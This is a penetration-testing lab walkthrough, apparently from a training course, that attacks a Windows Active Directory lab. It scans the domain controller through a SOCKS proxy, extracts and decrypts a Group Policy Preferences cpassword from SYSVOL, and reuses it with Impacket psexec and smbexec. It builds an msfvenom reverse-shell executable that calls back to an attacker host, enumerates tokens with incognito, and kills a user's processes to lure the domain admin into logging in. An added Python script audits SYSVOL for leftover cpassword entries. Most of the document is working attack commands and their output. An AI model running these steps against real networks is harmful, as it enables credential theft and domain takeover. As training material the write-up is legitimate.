[2019-06-01T19:00:30+08:00] [info] [config] [socks proxy]
[2019-06-01T19:00:30+08:00] [info] [config] [circuit]
[2019-06-01T19:00:30+08:00] [info] [ssfd] listening on <*:11111>
[2019-06-01T19:00:30+08:00] [info] [ssfd] running (Ctrl + C to stop)
[2019-06-01T19:01:20+08:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:22222> to 22222
The above works with an /etc/proxychains.conf configuration of:
socks4 127.0.0.1 22222
This next step strictly isn't necessary, but I did it just to see what kind of AD is running
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains nmap -sTV -sC -n -Pn 192.168.200.100
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 12:03 +08
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:35:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.50% done; ETC: 16:06 (3:27:39 remaining)
Stats: 0:35:44 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.70% done; ETC: 16:06 (3:27:15 remaining)
Oops, that's taking too long (3+ hours), so let's do a very selective port scan instead.
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains nmap -n -Pn -sTV -sC -p53,88,135,137,139,389,445,464,593,636,3268,3269,3389,5722,9389,47001,49157 192.168.200.100
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 18:23 +08
Nmap scan report for 192.168.200.100
Host is up (1.4s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS 6.0.6001 (17714726) (Windows Server 2008 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.0.6001 (17714726)
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2019-06-02 10:25:28Z)
135/tcp   open   msrpc         Microsoft Windows RPC
137/tcp   closed netbios-ns
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: examplead.lan, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds  Windows Server (R) 2008 Datacenter 6001 Service Pack 1 microsoft-ds
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: examplead.lan, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
3389/tcp  open   ms-wbt-server Microsoft Terminal Service
|_ssl-date: 2019-06-02T10:27:40+00:00; -4s from scanner time.
5722/tcp  open   msrpc         Microsoft Windows RPC
9389/tcp  closed adws
47001/tcp closed winrm
49157/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
|_clock-skew: mean: 1h45m11s, deviation: 3h30m29s, median: -2s
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Datacenter 6001 Service Pack 1 (Windows Server (R) 2008 Datacenter 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: DC01
|   NetBIOS computer name: DC01\x00
|   Domain name: examplead.lan
|   Forest name: examplead.lan
|   FQDN: DC01.examplead.lan
|_  System time: 2019-06-02T03:27:46-07:00
| smb-security-mode:
|   account_used:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-06-02 18:28:21
|_  start_date: 2019-06-01 05:45:59

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 427.07 seconds
So SMB signing is required, so the typical Responder relay attacks won't work here. We can see that Kerberos is running, but Kerberoasting led to a dead end (see below). Now what if we checked the network shares on the AD server? Why do this at all? ADsecurity has a good post on this here.
Basically, in the old (pre-2014) days, Microsoft offered Group Policy Preferences as a tool for changing the local administrator passwords on many computers joined to one AD domain. As ADsecurity explains:
One of my customers recently needed to change the local administrator password on several hundred Windows 7 workstations and was trying to determine the best method: PowerShell script or Group Policy Preferences.
The easy answer is to use Group Policy Preferences since it has a built-in mechanism for changing/managing local computer passwords. The problem is that while the password in Group Policy Preferences is encrypted using AES 256, the private key for the encryption is posted on MSDN.
The encrypted local admin passwords are stored in a share on the AD server that any domain user can read without special tools, specifically the SYSVOL share. To make matters worse, Microsoft published the AES key needed to decrypt them on MSDN, effectively turning them into plaintext password files. Microsoft eventually released a patch in 2014, naming the vulnerability MS14-025, but the patch only stops new passwords from being stored; existing entries remain until an admin removes them, so unpatched and uncleaned systems still exist. The passwords are stored in Groups.xml somewhere in the SYSVOL share. You can read through 0xdf's guide or IppSec's walkthrough of the Active box on HTB to see how they did it, but I'll do it below.
First we look for the SYSVOL share on the DC.
C:\Users\SecondUser\Desktop>net view dc01.examplead.lan
net view dc01.examplead.lan
Shared resources at dc01.examplead.lan

Share name   Type  Used as  Comment
-------------------------------------------------------------------------------
FooResearch  Disk
NETLOGON     Disk           Logon server share
SYSVOL       Disk           Logon server share
The command completed successfully.
Great, it exists. Now let's check what's inside.
C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL
dir \\dc01.examplead.lan\SysVOL
 Volume in drive \\dc01.examplead.lan\SysVOL has no label.
 Volume Serial Number is 6C66-920E

 Directory of \\dc01.examplead.lan\SysVOL

06/24/2014  03:19 AM    <DIR>          .
06/24/2014  03:19 AM    <DIR>          ..
06/24/2014  03:19 AM    <JUNCTION>     examplead.lan [C:\Windows\SYSVOL\domain]
               0 File(s)              0 bytes
               3 Dir(s)     711,684,096 bytes free

C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL\examplead.lan
dir \\dc01.examplead.lan\SysVOL\examplead.lan
 Volume in drive \\dc01.examplead.lan\SysVOL has no label.
 Volume Serial Number is 6C66-920E

 Directory of \\dc01.examplead.lan\SysVOL\examplead.lan

06/24/2014  03:21 AM    <DIR>          .
06/24/2014  03:21 AM    <DIR>          ..
07/31/2014  05:10 AM    <DIR>          Policies
06/24/2014  03:19 AM    <DIR>          scripts
               0 File(s)              0 bytes
               4 Dir(s)     711,684,096 bytes free

C:\Users\SecondUser\Desktop>dir \\dc01.examplead.lan\SysVOL\examplead.lan\Policies
dir \\dc01.examplead.lan\SysVOL\examplead.lan\Policies
 Volume in drive \\dc01.examplead.lan\SysVOL has no label.
 Volume Serial Number is 6C66-920E

 Directory of \\dc01.examplead.lan\SysVOL\examplead.lan\Policies

07/31/2014  05:10 AM    <DIR>          .
07/31/2014  05:10 AM    <DIR>          ..
06/24/2014  03:20 AM    <DIR>          {31B2F340-016D-11D2-945F-00C04FB984F9}
07/31/2014  05:11 AM    <DIR>          {69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}
06/24/2014  03:20 AM    <DIR>          {6AC1786C-016F-11D2-945F-00C04fB984F9}
06/24/2014  06:43 AM    <DIR>          {7635CC99-2423-4809-A2E6-20A9BB8294BB}
07/17/2014  05:40 AM    <DIR>          {9E4B6CF5-DE26-4631-A4A6-D0C845998366}
               0 File(s)              0 bytes
               7 Dir(s)     711,684,096 bytes free
At this point it's clear that we have to search for the file unless we want to go down each sub-directory's rabbit hole manually. On Windows Server 2003 and later there is an alternative to dir /s, namely the where command. The syntax for using it is
where /r [path to search recursively] [file to search]
The /r switch tells the command to search recursively, i.e. to search all subdirectories and sub-subdirectories for the file. In our case the command would be
C:\Users\SecondUser\Desktop>where /r \\dc01.examplead.lan\SysVOL\examplead.lan\Policies Groups.xml
where /r \\dc01.examplead.lan\SysVOL\examplead.lan\Policies Groups.xml
\\dc01.examplead.lan\SysVOL\examplead.lan\Policies\{69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}\Machine\Preferences\Groups\Groups.xml
\\dc01.examplead.lan\SysVOL\examplead.lan\Policies\{9E4B6CF5-DE26-4631-A4A6-D0C845998366}\Machine\Preferences\Groups\Groups.xml
So we found two files. Let's see what they contain.
I took a screenshot because otherwise I'd have to strip all the angle brackets. From the above, one of the files contains an Administrator user named LADM with the password
cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY"
To decrypt it we turn to Kali's gpp-decrypt utility
root@Kali:~/PTP/5.3 XSS/Lab 27# gpp-decrypt 0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
Pm2fUXScqI
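As an added example (not part of the original writeup), here is the defender's side of the MS14-025 exposure walked through above: an audit that sweeps a copy of the SYSVOL Policies tree, parses the Group Policy Preferences XML files and reports every element that still carries a cpassword attribute, which is what the where /r search and the manual read of Groups.xml found by hand. It goes beyond Groups.xml to the other preference files the same patch covered. The sample tree is constructed here; the GPO folder names and the LADM cpassword value are the ones shown in the lab output, the XML bodies and the service account are constructed.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that may carry a cpassword attribute; MS14-025 covered all
# of them, not only Groups.xml.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute names the different preference types use for the account.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")

def gpo_guid(path):
    """Return the {GUID} policy folder that contains path, or None."""
    for part in path.replace("\\", "/").split("/"):
        if part.startswith("{") and part.endswith("}"):
            return part
    return None

def scan_gpp_file(path):
    """Parse one GPP XML file; one finding per element carrying cpassword."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings  # unreadable file: skip it, keep sweeping
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                        if a in elem.attrib), "")
        findings.append({"file": path, "gpo": gpo_guid(path),
                         "element": elem.tag, "account": account,
                         "cpassword": elem.attrib["cpassword"]})
    return findings

def audit_sysvol(policies_dir):
    """Walk a Policies tree and collect every cpassword still present."""
    findings = []
    for dirpath, _dirs, files in os.walk(policies_dir):
        for name in files:
            if name in GPP_FILES:
                findings.extend(scan_gpp_file(os.path.join(dirpath, name)))
    return findings

# --- Constructed sample tree: folder layout and the LADM cpassword are the
# --- values from the lab output; the XML bodies around them are constructed.
GROUPS_LADM = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LADM" image="2" changed="2014-07-31 12:12:00">
    <Properties action="U" newName="" fullName="LADM" description=""
      cpassword="0cU/uGQrF5Xfhm61HAK8wFlfYce2W6ODQAeI957VrqY"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="LADM"/>
  </User>
</Groups>
"""
# Second Groups.xml from the where /r output: constructed with no password.
GROUPS_CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Remote Desktop Users (built-in)">
    <Properties action="U" groupName="Remote Desktop Users (built-in)"/>
  </Group>
</Groups>
"""
# Constructed: a service account left behind in another lab GPO's Services.xml.
SERVICES_SVC = """<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="BackupAgent">
    <Properties serviceName="BackupAgent" accountName="EXAMPLEAD\\svc_backup"
      cpassword="CONSTRUCTED_PLACEHOLDER_VALUE"/>
  </NTService>
</NTServices>
"""
SAMPLE_LAYOUT = {
    "{69BCC2AD-B7E5-4E02-833D-DBFDD19E7EB4}/Machine/Preferences/Groups/Groups.xml": GROUPS_LADM,
    "{9E4B6CF5-DE26-4631-A4A6-D0C845998366}/Machine/Preferences/Groups/Groups.xml": GROUPS_CLEAN,
    "{7635CC99-2423-4809-A2E6-20A9BB8294BB}/Machine/Preferences/Services/Services.xml": SERVICES_SVC,
}

def build_sample_tree():
    """Write the constructed tree under a temp dir; return its Policies path."""
    policies = os.path.join(tempfile.mkdtemp(prefix="sysvol_"),
                            "examplead.lan", "Policies")
    for rel, body in SAMPLE_LAYOUT.items():
        full = os.path.join(policies, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return policies

if __name__ == "__main__":
    for f in audit_sysvol(build_sample_tree()):
        print("[!] %s %s: account=%r still stores a cpassword"
              % (f["gpo"], os.path.basename(f["file"]), f["account"]))
```

Pointing audit_sysvol at a real SYSVOL copy (\\dc01\SysVOL\examplead.lan\Policies in this lab) lists exactly the entries an administrator must delete and re-issue, since the patch does not remove them.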
Wow. We got the key. Now we need to find a lock that fits it. From the arp-scan above we identified 192.168.200.200 as a potential target in the same LAN. Let's try to log in with the credentials using Impacket's psexec.py. For more reading on connecting remotely with SMB credentials see this
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains psexec.py LADM:Pm2fUXScqI@192.168.200.200
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.200.200.....
[*] Found writable share ADMIN$
[*] Uploading file KywbiqYd.exe
[*] Opening SVCManager on 192.168.200.200.....
[*] Creating service mpsg on 192.168.200.200.....
[*] Starting service mpsg.....
[*] Opening SVCManager on 192.168.200.200.....
[*] Stopping service mpsg.....
[*] Removing service mpsg.....
[*] Removing file KywbiqYd.exe.....
Unfortunately we didn't get a shell. Not to worry, we can still try smbexec.py and wmiexec.py. Both of these work and give us a semi-interactive shell. You might wonder what that is; we used one in a previous post. An explanation of how it works is here. Basically, there isn't an actual shell running as a process on the target. Instead each command you type is dropped onto the target as a .bat file, executed, and its output is piped back to your STDOUT before the .bat file is deleted. A kind of smart way of evading persistence detection or people who monitor processes.
Running smbexec gives
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains smbexec.py LADM:Pm2fUXScqI@192.168.200.200
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>echo %userdomain%\%userame%
\

C:\WINDOWS\system32>echo %userdomain%\%username%
\
Ok, we got in but couldn't verify our user permissions or identity because the commands above didn't work. We must be on a very old Windows system, probably XP. At least we can confirm we are on the target system and that it can connect back to Kali.
C:\WINDOWS\system32>ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : PCClientXP
        Primary Dns Suffix  . . . . . . . : examplead.lan
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : examplead.lan

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-50-56-A1-DD-E3
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.200.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.200.1
        DNS Servers . . . . . . . . . . . : 192.168.200.100

C:\WINDOWS\system32>ping 172.16.111.30

Pinging 172.16.111.30 with 32 bytes of data:

Reply from 172.16.111.30: bytes=32 time=233ms TTL=63
Reply from 172.16.111.30: bytes=32 time=233ms TTL=63
Reply from 172.16.111.30: bytes=32 time=233ms TTL=63
Reply from 172.16.111.30: bytes=32 time=233ms TTL=63

Ping statistics for 172.16.111.30:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 233ms, Maximum = 233ms, Average = 233ms
Note that because the shell is "semi-interactive" we cannot change the working directory and are forced to use absolute rather than relative paths
C:\WINDOWS\system32>cd\
[-] You can't CD under SMBEXEC. Use full paths.
We can confirm we are on the same domain and that LADM exists as a local admin account
C:\WINDOWS\system32>net user /domain
The request will be processed at a domain controller for domain examplead.lan.

User accounts for \\DC01.examplead.lan

-------------------------------------------------------------------------------
Administrator            exampleadm               ExampleUser
Guest                    krbtgt                   SecondUser
The command completed with one or more errors.

C:\WINDOWS\system32>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
LADM                     SUPPORT_388945a0
The command completed with one or more errors.
Here we check the details of what system we're on
C:\WINDOWS\system32>systeminfo

Host Name:                 PCCLIENTXP
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          eLS
Registered Organization:   eLS
Product ID:                76487-032-1797031-22304
Original Install Date:     2/8/2012, 1:34:32 PM
System Up Time:            2 Days, 6 Hours, 22 Minutes, 31 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     255 MB
Available Physical Memory: 132 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use:    39 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    examplead.lan
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB958644 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.200.200
And also set, which tells us a bit about the running environment
C:\Lab27>set
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=PCCLIENTXP
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService
windir=C:\WINDOWS
We now have enough information to piece together a layout of what the network diagram looks like.
We can of course copy over Kali's whoami.exe to check our username on the system.
C:\WINDOWS\system32>copy \\172.16.111.30\Lab27\whoami.exe C:\Lab27
        1 file(s) copied.

C:\WINDOWS\system32>C:\Lab27\whoami.exe
NT AUTHORITY\SYSTEM
So we are already SYSTEM. If we weren't, it should be possible to escalate to SYSTEM with PsExec, since LADM (which we logged in with) is already in the local Administrators group
C:\Lab27>whoami.exe
whoami.exe
PCCLIENTXP\LADM

C:\Lab27>net user LADM
net user LADM
User name                    LADM
Full Name                    LADM
Comment                      User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/31/2014 5:12 AM
Password expires             Never
Password changeable          8/1/2014 5:12 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/1/2019 8:02 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
Ok, so to upgrade to a more stable shell instead of a semi-interactive one, just generate a reverse shell with msfvenom, run it, and catch it with a listener.
root@Kali:~/PTP/5.3 XSS/Lab 27# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.16.111.30 LPORT=4499 -f exe -o 200_shell.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: 200_shell.exe

C:\WINDOWS\system32>copy \\172.16.111.30\Lab27\200_shell.exe C:\Lab27\200_shell.exe
        1 file(s) copied.
Right. So what can we do here as SYSTEM? Remember the goal of the lab is to get the domain admin account or credentials. We have SYSTEM, but these are local rights, not domain rights. So what can we do?
One way is to check for access tokens left on the system from when the domain admin has logged in. We could do this via Meterpreter as done earlier, but recall we are restricting its use. So let's see if we can run the incognito extension standalone, without Meterpreter. MWR Labs released incognito2 here as a standalone executable.
There are some guides on how to do this; this one is from more than 10 years ago (!) but is still relevant today. SANS has a good explanation of what access tokens are here. Ok, let's see how to use incognito.
Let's first list the tokens
C:\Lab27\incognito2>incognito.exe list_tokens -u
incognito.exe list_tokens -u
[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available
============================================
EXAMPLEAD\ExampleUser
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
============================================
EXAMPLEAD\Administrator
NT AUTHORITY\ANONYMOUS LOGON

Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeLoadDriverPrivilege
From the above we see only one other domain user. Let's check whether that is a domain admin. Doesn't look like it.
C:\Lab27\incognito2>net user ExampleUser /domain
net user ExampleUser /domain
The request will be processed at a domain controller for domain examplead.lan.

User name                    ExampleUser
Full Name                    Example User
Comment                      User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/24/2014 6:14 AM
Password expires             Never
Password changeable          6/25/2014 6:14 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/1/2019 3:11 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Example Group         *Domain Users
The command completed successfully.
Yep, confirmed it's just a domain user. What about 'exampleadm', which we saw above?
C:\WINDOWS\system32>net user exampleadm /domain
The request will be processed at a domain controller for domain examplead.lan.

User name                    exampleadm
Full Name                    exampleadm
Comment                      User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/17/2014 6:39 AM
Password expires             Never
Password changeable          7/18/2014 6:39 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/17/2014 6:12 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Group Policy Creator  *Domain Admins
                             *Enterprise Admins     *Domain Users
                             *Schema Admins
The command completed successfully.
Yep, that's the account we want to impersonate. Unfortunately the list of tokens above didn't include exampleadm. What can we do? We could either wait for the domain admin to eventually log in, or we could make him log in. The domain admin is likely some sysadmin who may log in to investigate problems raised by (pesky) users, such as programs terminating unexpectedly, which is something we can cause as SYSTEM.
Let's display a list of running processes together with their users
C:\Lab27>tasklist /v
tasklist /v

Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ====== ================ ======== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Console 0 28 K Running NT AUTHORITY\SYSTEM 5:07:37 N/A
System 4 Console 0 236 K Running NT AUTHORITY\SYSTEM 0:00:05 N/A
smss.exe 556 Console 0 384 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 620 Console 0 3,396 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
winlogon.exe 644 Console 0 6,056 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
services.exe 688 Console 0 5,952 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
lsass.exe 700 Console 0 4,088 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
vmacthlp.exe 864 Console 0 2,324 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 876 Console 0 4,904 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 956 Console 0 4,104 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1040 Console 0 23,532 K Running NT AUTHORITY\SYSTEM 0:00:19 System Agent COM WINDOW
svchost.exe 1104 Console 0 3,384 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1152 Console 0 4,332 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
spoolsv.exe 1444 Console 0 4,336 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
vmtoolsd.exe 1776 Console 0 10,128 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
explorer.exe 1924 Console 0 11,800 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
vmtoolsd.exe 220 Console 0 8,220 K Running EXAMPLEAD\ExampleUser 0:00:01 N/A
ctfmon.exe 256 Console 0 2,792 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
cmd.exe 316 Console 0 1,556 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
cmd.exe 324 Console 0 2,448 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
LegApp.EXE 364 Console 0 2,216 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
logon.scr 160 Console 0 1,796 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
cmd.exe 752 Console 0 2,368 K Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\execute.bat
200_shell.exe 1416 Console 0 1,540 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 592 Console 0 2,632 K Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe - tasklist /v
tasklist.exe 348 Console 0 4,140 K Running NT AUTHORITY\SYSTEM 0:00:00 OleMainThreadWndName
wmiprvse.exe 1684 Console 0 5,528 K Running NT AUTHORITY\NETWORK
BTW, I also tried wmic process instead. Guess what that did?
C:\Lab27>wmic process
wmic process
Please wait while WMIC is being installed.
Yeah. So personally I would avoid wmic commands unless necessary. From the task list above we see some processes run by ExampleUser, a domain user. Let's try killing those processes.
C:\Lab27\incognito2>taskkill /F /PID 316
taskkill /F /PID 316
SUCCESS: The process with PID 316 has been terminated.

C:\Lab27\incognito2>taskkill /F /PID 324
taskkill /F /PID 324
SUCCESS: The process with PID 324 has been terminated.

C:\Lab27\incognito2>taskkill /F /PID 256
taskkill /F /PID 256
SUCCESS: The process with PID 256 has been terminated.

C:\Lab27\incognito2>taskkill /F /PID 220
taskkill /F /PID 220
SUCCESS: The process with PID 220 has been terminated.
At this point the domain admin exampleadm should have logged in via cmd to see what's up. If not, we can try deleting programs from the list above, like LegApp.exe, to provoke the user into alerting the admin.
C:\Lab27\incognito>tasklist /v
tasklist /v

Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ====== ================ ======== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Console 0 28 K Running NT AUTHORITY\SYSTEM 2:34:56 N/A
System 4 Console 0 236 K Running NT AUTHORITY\SYSTEM 0:00:04 N/A
smss.exe 556 Console 0 388 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 620 Console 0 3,280 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
winlogon.exe 644 Console 0 6,404 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
services.exe 688 Console 0 5,964 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
lsass.exe 700 Console 0 4,948 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
vmacthlp.exe 864 Console 0 2,324 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 876 Console 0 4,920 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 956 Console 0 4,112 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1040 Console 0 21,036 K Running NT AUTHORITY\SYSTEM 0:00:09 System Agent COM WINDOW
svchost.exe 1096 Console 0 3,388 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1132 Console 0 4,332 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
spoolsv.exe 1452 Console 0 4,336 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
explorer.exe 1872 Console 0 11,804 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
vmtoolsd.exe 1912 Console 0 10,092 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
logon.scr 764 Console 0 1,796 K Running EXAMPLEAD\ExampleUser 0:00:00 N/A
cmd.exe 384 Console 0 2,468 K Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe /Q /c C:\WINDOWS\TEMP\execute.bat
200_shell.exe 404 Console 0 1,540 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
